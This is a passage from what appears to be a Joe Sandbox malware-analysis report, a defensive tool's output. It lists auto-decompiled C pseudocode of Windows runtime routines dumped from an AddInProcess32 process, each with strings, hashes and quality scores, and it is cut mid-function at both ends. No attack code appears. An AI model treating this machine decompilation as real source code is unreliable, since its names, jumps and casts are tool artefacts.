                              																						_t91 =  *(_t177 + 0x20);
                              																						goto L74;
                              																					}
                              																				}
                              																			}
                              																			goto L35;
                              																		} else {
                              																			__eflags = _t141;
                              																			if(_t141 != 0) {
                              																				_t177 = E0188FD22(_t177);
                              																				__eflags = _t177;
                              																				if(_t177 == 0) {
                              																					L42:
                              																					_t77 = 0xc0000001;
                              																					goto L33;
                              																				} else {
                              																					_t130 = E0188FD9B(_t177, 0, 4);
                              																					__eflags = _t130;
                              																					if(_t130 != 0) {
                              																						goto L42;
                              																					} else {
                              																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
                              																						_t91 =  *(_t177 + 0x20);
                              																						goto L26;
                              																					}
                              																				}
                              																				goto L35;
                              																			} else {
                              																				L26:
                              																				_t94 = _t91 & 0xfffffffb | 0x00000002;
                              																				__eflags = _t94;
                              																				L27:
                              																				 *(_t177 + 0x20) = _t94;
                              																				__eflags = _t170 & 0x00008000;
                              																				if((_t170 & 0x00008000) != 0) {
                              																					_t95 = _a12;
                              																					__eflags = _t95;
                              																					if(_t95 != 0) {
                              																						_t96 =  *_t95;
                              																						__eflags = _t96;
                              																						if(_t96 != 0) {
                              																							 *((short*)(_t177 + 0x22)) = 0;
                              																							_t40 = _t177 + 0x20;
                              																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
                              																							__eflags =  *_t40;
                              																						}
                              																					}
                              																				}
                              																				goto L31;
                              																			}
                              																		}
                              																	}
                              																}
                              															}
                              														}
                              													} else {
                              														_t147 =  *( *[fs:0x18] + 0xfc0);
                              														_t106 =  *(_t147 + 0x20);
                              														__eflags = _t106 & 0x00000040;
                              														if((_t106 & 0x00000040) != 0) {
                              															_t147 = E0188FD22(_t147);
                              															__eflags = _t147;
                              															if(_t147 == 0) {
                              																L41:
                              																_t130 = 0xc0000001;
                              																L32:
                              																_t77 = _t130;
                              																goto L33;
                              															} else {
                              																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
                              																_t106 =  *(_t147 + 0x20);
                              																goto L17;
                              															}
                              															goto L35;
                              														} else {
                              															L17:
                              															_t108 = _t106 | 0x00000080;
                              															__eflags = _t108;
                              															 *(_t147 + 0x20) = _t108;
                              															 *( *[fs:0x18] + 0xfc0) = _t147;
                              															goto L18;
                              														}
                              													}
                              												}
                              											}
                              											L33:
                              										}
                              									}
                              								}
                              							}
                              						}
                              						L35:
                              						return _t77;
                              					} else {
                              						 *_t75 = 0x1947b80;
                              						 *((intOrPtr*)(_t75 + 4)) = _t134;
                              						 *_t134 = _t75;
                              						 *0x1947b84 = _t75;
                              						_t73 = E0186EB70(_t134, 0x1947b60);
                              						if( *0x1947b20 != 0) {
                              							_t73 =  *( *[fs:0x30] + 0xc);
                              							if( *((char*)(_t73 + 0x28)) == 0) {
                              								_t73 = E0186FF60( *0x1947b20);
                              							}
                              						}
                              						goto L5;
                              					}
                              				}
                              			}


















































                              Strings
                              • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 018CBE0F
                              Memory Dump Source
                              • Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                              • Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd
                              Similarity
                              • API ID:
                              • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
                              • API String ID: 0-865735534
                              • Opcode ID: 1ea0ae1648eb4c17a3f494c2bf1ba9a0a3230cad1637014429b0bfb5c438d632
                              • Instruction ID: f0379d6e88f017ee96e467abafcd881dee20a7dc00e16ebee702b5c0412e8f12
                              • Opcode Fuzzy Hash: 1ea0ae1648eb4c17a3f494c2bf1ba9a0a3230cad1637014429b0bfb5c438d632
                              • Instruction Fuzzy Hash: 7EA10231B00A1A8BEB35EF6CC450B6AB7A5AF44B64F04456DEB06CB681DB34DB41CB91
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 63%
                              			E01852D8A(void* __ebx, signed char __ecx, signed int __edx, signed int __edi) {
                              				signed char _v8;
                              				signed int _v12;
                              				signed int _v16;
                              				signed int _v20;
                              				signed int _v24;
                              				intOrPtr _v28;
                              				intOrPtr _v32;
                              				signed int _v52;
                              				void* __esi;
                              				void* __ebp;
                              				intOrPtr _t55;
                              				signed int _t57;
                              				signed int _t58;
                              				char* _t62;
                              				signed char* _t63;
                              				signed char* _t64;
                              				signed int _t67;
                              				signed int _t72;
                              				signed int _t77;
                              				signed int _t78;
                              				signed int _t88;
                              				intOrPtr _t89;
                              				signed char _t93;
                              				signed int _t97;
                              				signed int _t98;
                              				signed int _t102;
                              				signed int _t103;
                              				intOrPtr _t104;
                              				signed int _t105;
                              				signed int _t106;
                              				signed char _t109;
                              				signed int _t111;
                              				void* _t116;
                              
                              				_t102 = __edi;
                              				_t97 = __edx;
                              				_v12 = _v12 & 0x00000000;
                              				_t55 =  *[fs:0x18];
                              				_t109 = __ecx;
                              				_v8 = __edx;
                              				_t86 = 0;
                              				_v32 = _t55;
                              				_v24 = 0;
                              				_push(__edi);
                              				if(__ecx == 0x1945350) {
                              					_t86 = 1;
                              					_v24 = 1;
                              					 *((intOrPtr*)(_t55 + 0xf84)) = 1;
                              				}
                              				_t103 = _t102 | 0xffffffff;
                              				if( *0x1947bc8 != 0) {
                              					_push(0xc000004b);
                              					_push(_t103);
                              					E018997C0();
                              				}
                              				if( *0x19479c4 != 0) {
                              					_t57 = 0;
                              				} else {
                              					_t57 = 0x19479c8;
                              				}
                              				_v16 = _t57;
                              				if( *((intOrPtr*)(_t109 + 0x10)) == 0) {
                              					_t93 = _t109;
                              					L23();
                              				}
                              				_t58 =  *_t109;
                              				if(_t58 == _t103) {
                              					__eflags =  *(_t109 + 0x14) & 0x01000000;
                              					_t58 = _t103;
                              					if(__eflags == 0) {
                              						_t93 = _t109;
                              						E01881624(_t86, __eflags);
                              						_t58 =  *_t109;
                              					}
                              				}
                              				_v20 = _v20 & 0x00000000;
                              				if(_t58 != _t103) {
                              					 *((intOrPtr*)(_t58 + 0x14)) =  *((intOrPtr*)(_t58 + 0x14)) + 1;
                              				}
                              				_t104 =  *((intOrPtr*)(_t109 + 0x10));
                              				_t88 = _v16;
                              				_v28 = _t104;
                              				L9:
                              				while(1) {
                              					if(E01877D50() != 0) {
                              						_t62 = ( *[fs:0x30])[0x50] + 0x228;
                              					} else {
                              						_t62 = 0x7ffe0382;
                              					}
                              					if( *_t62 != 0) {
                              						_t63 =  *[fs:0x30];
                              						__eflags = _t63[0x240] & 0x00000002;
                              						if((_t63[0x240] & 0x00000002) != 0) {
                              							_t93 = _t109;
                              							E018EFE87(_t93);
                              						}
                              					}
                              					if(_t104 != 0xffffffff) {
                              						_push(_t88);
                              						_push(0);
                              						_push(_t104);
                              						_t64 = E01899520();
                              						goto L15;
                              					} else {
                              						while(1) {
                              							_t97 =  &_v8;
                              							_t64 = E0188E18B(_t109 + 4, _t97, 4, _t88, 0);
                              							if(_t64 == 0x102) {
                              								break;
                              							}
                              							_t93 =  *(_t109 + 4);
                              							_v8 = _t93;
                              							if((_t93 & 0x00000002) != 0) {
                              								continue;
                              							}
                              							L15:
                              							if(_t64 == 0x102) {
                              								break;
                              							}
                              							_t89 = _v24;
                              							if(_t64 < 0) {
                              								E018ADF30(_t93, _t97, _t64);
                              								_push(_t93);
                              								_t98 = _t97 | 0xffffffff;
                              								__eflags =  *0x1946901;
                              								_push(_t109);
                              								_v52 = _t98;
                              								if( *0x1946901 != 0) {
                              									_push(0);
                              									_push(1);
                              									_push(0);
                              									_push(0x100003);
                              									_push( &_v12);
                              									_t72 = E01899980();
                              									__eflags = _t72;
                              									if(_t72 < 0) {
                              										_v12 = _t98 | 0xffffffff;
                              									}
                              								}
                              								asm("lock cmpxchg [ecx], edx");
                              								_t111 = 0;
                              								__eflags = 0;
                              								if(0 != 0) {
                              									__eflags = _v12 - 0xffffffff;
                              									if(_v12 != 0xffffffff) {
                              										_push(_v12);
                              										E018995D0();
                              									}
                              								} else {
                              									_t111 = _v12;
                              								}
                              								return _t111;
                              							} else {
                              								if(_t89 != 0) {
                              									 *((intOrPtr*)(_v32 + 0xf84)) = 0;
                              									_t77 = E01877D50();
                              									__eflags = _t77;
                              									if(_t77 == 0) {
                              										_t64 = 0x7ffe0384;
                              									} else {
                              										_t64 = ( *[fs:0x30])[0x50] + 0x22a;
                              									}
                              									__eflags =  *_t64;
                              									if( *_t64 != 0) {
                              										_t64 =  *[fs:0x30];
                              										__eflags = _t64[0x240] & 0x00000004;
                              										if((_t64[0x240] & 0x00000004) != 0) {
                              											_t78 = E01877D50();
                              											__eflags = _t78;
                              											if(_t78 == 0) {
                              												_t64 = 0x7ffe0385;
                              											} else {
                              												_t64 = ( *[fs:0x30])[0x50] + 0x22b;
                              											}
                              											__eflags =  *_t64 & 0x00000020;
                              											if(( *_t64 & 0x00000020) != 0) {
                              												_t64 = E018D7016(0x1483, _t97 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
                              											}
                              										}
                              									}
                              								}
                              								return _t64;
                              							}
                              						}
                              						_t97 = _t88;
                              						_t93 = _t109;
                              						E018EFDDA(_t97, _v12);
                              						_t105 =  *_t109;
                              						_t67 = _v12 + 1;
                              						_v12 = _t67;
                              						__eflags = _t105 - 0xffffffff;
                              						if(_t105 == 0xffffffff) {
                              							_t106 = 0;
                              							__eflags = 0;
                              						} else {
                              							_t106 =  *(_t105 + 0x14);
                              						}
                              						__eflags = _t67 - 2;
                              						if(_t67 > 2) {
                              							__eflags = _t109 - 0x1945350;
                              							if(_t109 != 0x1945350) {
                              								__eflags = _t106 - _v20;
                              								if(__eflags == 0) {
                              									_t93 = _t109;
                              									E018EFFB9(_t88, _t93, _t97, _t106, _t109, __eflags);
                              								}
                              							}
                              						}
                              						_push("RTL: Re-Waiting\n");
                              						_push(0);
                              						_push(0x65);
                              						_v20 = _t106;
                              						E018E5720();
                              						_t104 = _v28;
                              						_t116 = _t116 + 0xc;
                              						continue;
                              					}
                              				}
                              			}
                              0x018afa4f
                              0x018afa51
                              0x018afa53
                              0x018afa56
                              0x018afa5b
                              0x018afa5e
                              0x00000000
                              0x018afa5e
                              0x01852e23

                              Strings
                              Memory Dump Source
                              • Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                              • Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd
                              Similarity
                              • API ID:
                              • String ID: RTL: Re-Waiting
                              • API String ID: 0-316354757
                              • Opcode ID: f7d9acbda4be7feb1f2124e998bb27832e9e675b8ae749e98da763403ffe0086
                              • Instruction ID: 7299132cc915934c23c965e189cf0bd31351901ebdaab006f4cca647d8240e0c
                              • Opcode Fuzzy Hash: f7d9acbda4be7feb1f2124e998bb27832e9e675b8ae749e98da763403ffe0086
                              • Instruction Fuzzy Hash: 8561F731A00649DFEB32DB6CC894BBE7BA6EB44718F580259DA11D72C1DB34AB41C791
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 80%
                              			E01920EA5(void* __ecx, void* __edx) {
                              				signed int _v20;
                              				char _v24;
                              				intOrPtr _v28;
                              				unsigned int _v32;
                              				signed int _v36;
                              				intOrPtr _v40;
                              				char _v44;
                              				intOrPtr _v64;
                              				void* __ebx;
                              				void* __edi;
                              				signed int _t58;
                              				unsigned int _t60;
                              				intOrPtr _t62;
                              				char* _t67;
                              				char* _t69;
                              				void* _t80;
                              				void* _t83;
                              				intOrPtr _t93;
                              				intOrPtr _t115;
                              				char _t117;
                              				void* _t120;
                              
                              				_t83 = __edx;
                              				_t117 = 0;
                              				_t120 = __ecx;
                              				_v44 = 0;
                              				if(E0191FF69(__ecx,  &_v44,  &_v32) < 0) {
                              					L24:
                              					_t109 = _v44;
                              					if(_v44 != 0) {
                              						E01921074(_t83, _t120, _t109, _t117, _t117);
                              					}
                              					L26:
                              					return _t117;
                              				}
                              				_t93 =  *((intOrPtr*)(__ecx + 0x3c));
                              				_t5 = _t83 + 1; // 0x1
                              				_v36 = _t5 << 0xc;
                              				_v40 = _t93;
                              				_t58 =  *(_t93 + 0xc) & 0x40000000;
                              				asm("sbb ebx, ebx");
                              				_t83 = ( ~_t58 & 0x0000003c) + 4;
                              				if(_t58 != 0) {
                              					_push(0);
                              					_push(0x14);
                              					_push( &_v24);
                              					_push(3);
                              					_push(_t93);
                              					_push(0xffffffff);
                              					_t80 = E01899730();
                              					_t115 = _v64;
                              					if(_t80 < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t115) {
                              						_push(_t93);
                              						E0191A80D(_t115, 1, _v20, _t117);
                              						_t83 = 4;
                              					}
                              				}
                              				if(E0191A854( &_v44,  &_v36, _t117, 0x40001000, _t83, _t117,  *((intOrPtr*)(_t120 + 0x34)),  *((intOrPtr*)(_t120 + 0x38))) < 0) {
                              					goto L24;
                              				}
                              				_t60 = _v32;
                              				_t97 = (_t60 != 0x100000) + 1;
                              				_t83 = (_v44 -  *0x1948b04 >> 0x14) + (_v44 -  *0x1948b04 >> 0x14);
                              				_v28 = (_t60 != 0x100000) + 1;
                              				_t62 = _t83 + (_t60 >> 0x14) * 2;
                              				_v40 = _t62;
                              				if(_t83 >= _t62) {
                              					L10:
                              					asm("lock xadd [eax], ecx");
                              					asm("lock xadd [eax], ecx");
                              					if(E01877D50() == 0) {
                              						_t67 = 0x7ffe0380;
                              					} else {
                              						_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                              					}
                              					if( *_t67 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
                              						E0191138A(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v36, 0xc);
                              					}
                              					if(E01877D50() == 0) {
                              						_t69 = 0x7ffe0388;
                              					} else {
                              						_t69 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                              					}
                              					if( *_t69 != 0) {
                              						E0190FEC0(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v32);
                              					}
                              					if(( *0x1948724 & 0x00000008) != 0) {
                              						E019152F8( *((intOrPtr*)(_t120 + 0x3c)),  *((intOrPtr*)(_t120 + 0x28)));
                              					}
                              					_t117 = _v44;
                              					goto L26;
                              				}
                              				while(E019215B5(0x1948ae4, _t83, _t97, _t97) >= 0) {
                              					_t97 = _v28;
                              					_t83 = _t83 + 2;
                              					if(_t83 < _v40) {
                              						continue;
                              					}
                              					goto L10;
                              				}
                              				goto L24;
                              			}

                              Strings
                              Memory Dump Source
                              • Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                              • Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd
                              Similarity
                              • API ID:
                              • String ID: `
                              • API String ID: 0-2679148245
                              • Opcode ID: 9dc28c7fac725f10660ffcbfac31c29b3b400d7b59c29c20aaf507a3bfcf9c7c
                              • Instruction ID: 73f431e5e3ad75ee10e18749eaeef8fdafa6b1f1a70b4f820763b460a3cd76c1
                              • Opcode Fuzzy Hash: 9dc28c7fac725f10660ffcbfac31c29b3b400d7b59c29c20aaf507a3bfcf9c7c
                              • Instruction Fuzzy Hash: BC51AF713443829FD325DF28D884F5BBBE9EBC4704F08092CFA4A97294D674E945C762
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 75%
                              			E0188F0BF(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
                              				intOrPtr _v8;
                              				intOrPtr _v12;
                              				intOrPtr _v16;
                              				char* _v20;
                              				intOrPtr _v24;
                              				char _v28;
                              				intOrPtr _v32;
                              				char _v36;
                              				char _v44;
                              				char _v52;
                              				intOrPtr _v56;
                              				char _v60;
                              				intOrPtr _v72;
                              				void* _t51;
                              				void* _t58;
                              				signed short _t82;
                              				short _t84;
                              				signed int _t91;
                              				signed int _t100;
                              				signed short* _t103;
                              				void* _t108;
                              				intOrPtr* _t109;
                              
                              				_t103 = __ecx;
                              				_t82 = __edx;
                              				_t51 = E01874120(0, __ecx, 0,  &_v52, 0, 0, 0);
                              				if(_t51 >= 0) {
                              					_push(0x21);
                              					_push(3);
                              					_v56 =  *0x7ffe02dc;
                              					_v20 =  &_v52;
                              					_push( &_v44);
                              					_v28 = 0x18;
                              					_push( &_v28);
                              					_push(0x100020);
                              					_v24 = 0;
                              					_push( &_v60);
                              					_v16 = 0x40;
                              					_v12 = 0;
                              					_v8 = 0;
                              					_t58 = E01899830();
                              					_t87 =  *[fs:0x30];
                              					_t108 = _t58;
                              					L018777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
                              					if(_t108 < 0) {
                              						L11:
                              						_t51 = _t108;
                              					} else {
                              						_push(4);
                              						_push(8);
                              						_push( &_v36);
                              						_push( &_v44);
                              						_push(_v60);
                              						_t108 = E01899990();
                              						if(_t108 < 0) {
                              							L10:
                              							_push(_v60);
                              							E018995D0();
                              							goto L11;
                              						} else {
                              							_t109 = L01874620(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t82 + 0x18);
                              							if(_t109 == 0) {
                              								_t108 = 0xc0000017;
                              								goto L10;
                              							} else {
                              								_t21 = _t109 + 0x18; // 0x18
                              								 *((intOrPtr*)(_t109 + 4)) = _v60;
                              								 *_t109 = 1;
                              								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
                              								 *(_t109 + 0xe) = _t82;
                              								 *((intOrPtr*)(_t109 + 8)) = _v56;
                              								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
                              								E0189F3E0(_t21, _t103[2],  *_t103 & 0x0000ffff);
                              								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
                              								 *((short*)(_t109 + 0xc)) =  *_t103;
                              								_t91 =  *_t103 & 0x0000ffff;
                              								_t100 = _t91 & 0xfffffffe;
                              								_t84 = 0x5c;
                              								if( *((intOrPtr*)(_t103[2] + _t100 - 2)) != _t84) {
                              									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
                              										_push(_v60);
                              										E018995D0();
                              										L018777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
                              										_t51 = 0xc0000106;
                              									} else {
                              										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
                              										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
                              										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
                              										goto L5;
                              									}
                              								} else {
                              									L5:
                              									 *_a4 = _t109;
                              									_t51 = 0;
                              								}
                              							}
                              						}
                              					}
                              				}
                              				return _t51;
                              			}

                              Strings
                              Memory Dump Source
                              • Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                              • Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd
                              Similarity
                              • API ID:
                              • String ID: @
                              • API String ID: 0-2766056989
                              • Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                              • Instruction ID: 8df316cc4ab5b7b2b813f4f3106fcd5d2d15bd5494f23385244d86f041fd4b5e
                              • Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                              • Instruction Fuzzy Hash: 0D518A71500B11ABC321DF19C841A6BBBF8FF48750F00892DFA95C7690E7B4EA04CB92
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 75%
                              			E018D3540(intOrPtr _a4) {
                              				signed int _v12;
                              				intOrPtr _v88;
                              				intOrPtr _v92;
                              				char _v96;
                              				char _v352;
                              				char _v1072;
                              				intOrPtr _v1140;
                              				intOrPtr _v1148;
                              				char _v1152;
                              				char _v1156;
                              				char _v1160;
                              				char _v1164;
                              				char _v1168;
                              				char* _v1172;
                              				short _v1174;
                              				char _v1176;
                              				char _v1180;
                              				char _v1192;
                              				void* __ebx;
                              				void* __edi;
                              				void* __esi;
                              				void* __ebp;
                              				short _t41;
                              				short _t42;
                              				intOrPtr _t80;
                              				intOrPtr _t81;
                              				signed int _t82;
                              				void* _t83;
                              
                              				_v12 =  *0x194d360 ^ _t82;
                              				_t41 = 0x14;
                              				_v1176 = _t41;
                              				_t42 = 0x16;
                              				_v1174 = _t42;
                              				_v1164 = 0x100;
                              				_v1172 = L"BinaryHash";
                              				_t81 = E01890BE0(0xfffffffc,  &_v352,  &_v1164, 0, 0, 0,  &_v1192);
                              				if(_t81 < 0) {
                              					L11:
                              					_t75 = _t81;
                              					E018D3706(0, _t81, _t79, _t80);
                              					L12:
                              					if(_a4 != 0xc000047f) {
                              						E0189FA60( &_v1152, 0, 0x50);
                              						_v1152 = 0x60c201e;
                              						_v1148 = 1;
                              						_v1140 = E018D3540;
                              						E0189FA60( &_v1072, 0, 0x2cc);
                              						_push( &_v1072);
                              						E018ADDD0( &_v1072, _t75, _t79, _t80, _t81);
                              						E018E0C30(0, _t75, _t80,  &_v1152,  &_v1072, 2);
                              						_push(_v1152);
                              						_push(0xffffffff);
                              						E018997C0();
                              					}
                              					return E0189B640(0xc0000135, 0, _v12 ^ _t82, _t79, _t80, _t81);
                              				}
                              				_t79 =  &_v352;
                              				_t81 = E018D3971(0, _a4,  &_v352,  &_v1156);
                              				if(_t81 < 0) {
                              					goto L11;
                              				}
                              				_t75 = _v1156;
                              				_t79 =  &_v1160;
                              				_t81 = E018D3884(_v1156,  &_v1160,  &_v1168);
                              				if(_t81 >= 0) {
                              					_t80 = _v1160;
                              					E0189FA60( &_v96, 0, 0x50);
                              					_t83 = _t83 + 0xc;
                              					_push( &_v1180);
                              					_push(0x50);
                              					_push( &_v96);
                              					_push(2);
                              					_push( &_v1176);
                              					_push(_v1156);
                              					_t81 = E01899650();
                              					if(_t81 >= 0) {
                              						if(_v92 != 3 || _v88 == 0) {
                              							_t81 = 0xc000090b;
                              						}
                              						if(_t81 >= 0) {
                              							_t75 = _a4;
                              							_t79 =  &_v352;
                              							E018D3787(_a4,  &_v352, _t80);
                              						}
                              					}
                              					L018777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v1168);
                              				}
                              				_push(_v1156);
                              				E018995D0();
                              				if(_t81 >= 0) {
                              					goto L12;
                              				} else {
                              					goto L11;
                              				}
                              			}

                              Strings
                              Memory Dump Source
                              • Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                              • Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd
                              Similarity
                              • API ID:
                              • String ID: BinaryHash
                              • API String ID: 0-2202222882
                              • Opcode ID: 5f6ae879b3361e8be0e554a34335b469442ced908498e606477e1bec6924e523
                              • Instruction ID: 90f12920e5c6689b1ac308920d7012813a6a46fb8244d12f52d7c39ec81ee6e1
                              • Opcode Fuzzy Hash: 5f6ae879b3361e8be0e554a34335b469442ced908498e606477e1bec6924e523
                              • Instruction Fuzzy Hash: 1A4132F1D0062DABDF219A54DC84FAEB77CAB54714F0045A5EA09E7241DB309F88CF96
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 71%
                              			E019205AC(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
                              				signed int _v20;
                              				char _v24;
                              				signed int _v28;
                              				char _v32;
                              				signed int _v36;
                              				intOrPtr _v40;
                              				void* __ebx;
                              				void* _t35;
                              				signed int _t42;
                              				char* _t48;
                              				signed int _t59;
                              				signed char _t61;
                              				signed int* _t79;
                              				void* _t88;
                              
                              				_v28 = __edx;
                              				_t79 = __ecx;
                              				if(E019207DF(__ecx, __edx,  &_a4,  &_a8, 0) == 0) {
                              					L13:
                              					_t35 = 0;
                              					L14:
                              					return _t35;
                              				}
                              				_t61 = __ecx[1];
                              				_t59 = __ecx[0xf];
                              				_v32 = (_a4 << 0xc) + (__edx - ( *__ecx & __edx) >> 4 << _t61) + ( *__ecx & __edx);
                              				_v36 = _a8 << 0xc;
                              				_t42 =  *(_t59 + 0xc) & 0x40000000;
                              				asm("sbb esi, esi");
                              				_t88 = ( ~_t42 & 0x0000003c) + 4;
                              				if(_t42 != 0) {
                              					_push(0);
                              					_push(0x14);
                              					_push( &_v24);
                              					_push(3);
                              					_push(_t59);
                              					_push(0xffffffff);
                              					if(E01899730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t59) {
                              						_push(_t61);
                              						E0191A80D(_t59, 1, _v20, 0);
                              						_t88 = 4;
                              					}
                              				}
                              				_t35 = E0191A854( &_v32,  &_v36, 0, 0x1000, _t88, 0,  *((intOrPtr*)(_t79 + 0x34)),  *((intOrPtr*)(_t79 + 0x38)));
                              				if(_t35 < 0) {
                              					goto L14;
                              				}
                              				E01921293(_t79, _v40, E019207DF(_t79, _v28,  &_a4,  &_a8, 1));
                              				if(E01877D50() == 0) {
                              					_t48 = 0x7ffe0380;
                              				} else {
                              					_t48 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                              				}
                              				if( *_t48 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
                              					E0191138A(_t59,  *((intOrPtr*)(_t79 + 0x3c)), _v32, _v36, 0xa);
                              				}
                              				goto L13;
                              			}


















                              Strings
                              Memory Dump Source
                              • Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                              • Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd
                              Similarity
                              • API ID:
                              • String ID: `
                              • API String ID: 0-2679148245
                              • Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                              • Instruction ID: f32b9c125f6d1570b97e2109980fed10340bb1f195f0020d5250fb40c0bc784c
                              • Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                              • Instruction Fuzzy Hash: CF31D33260435A6BE720DE28CD45F9B7BE9BBC4754F184229FA58DB284D770E904C791
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 72%
                              			E018D3884(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
                              				char _v8;
                              				intOrPtr _v12;
                              				intOrPtr* _v16;
                              				char* _v20;
                              				short _v22;
                              				char _v24;
                              				intOrPtr _t38;
                              				short _t40;
                              				short _t41;
                              				void* _t44;
                              				intOrPtr _t47;
                              				void* _t48;
                              
                              				_v16 = __edx;
                              				_t40 = 0x14;
                              				_v24 = _t40;
                              				_t41 = 0x16;
                              				_v22 = _t41;
                              				_t38 = 0;
                              				_v12 = __ecx;
                              				_push( &_v8);
                              				_push(0);
                              				_push(0);
                              				_push(2);
                              				_t43 =  &_v24;
                              				_v20 = L"BinaryName";
                              				_push( &_v24);
                              				_push(__ecx);
                              				_t47 = 0;
                              				_t48 = E01899650();
                              				if(_t48 >= 0) {
                              					_t48 = 0xc000090b;
                              				}
                              				if(_t48 != 0xc0000023) {
                              					_t44 = 0;
                              					L13:
                              					if(_t48 < 0) {
                              						L16:
                              						if(_t47 != 0) {
                              							L018777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t44, _t47);
                              						}
                              						L18:
                              						return _t48;
                              					}
                              					 *_v16 = _t38;
                              					 *_a4 = _t47;
                              					goto L18;
                              				}
                              				_t47 = L01874620(_t43,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
                              				if(_t47 != 0) {
                              					_push( &_v8);
                              					_push(_v8);
                              					_push(_t47);
                              					_push(2);
                              					_push( &_v24);
                              					_push(_v12);
                              					_t48 = E01899650();
                              					if(_t48 < 0) {
                              						_t44 = 0;
                              						goto L16;
                              					}
                              					if( *((intOrPtr*)(_t47 + 4)) != 1 ||  *(_t47 + 8) < 4) {
                              						_t48 = 0xc000090b;
                              					}
                              					_t44 = 0;
                              					if(_t48 < 0) {
                              						goto L16;
                              					} else {
                              						_t17 = _t47 + 0xc; // 0xc
                              						_t38 = _t17;
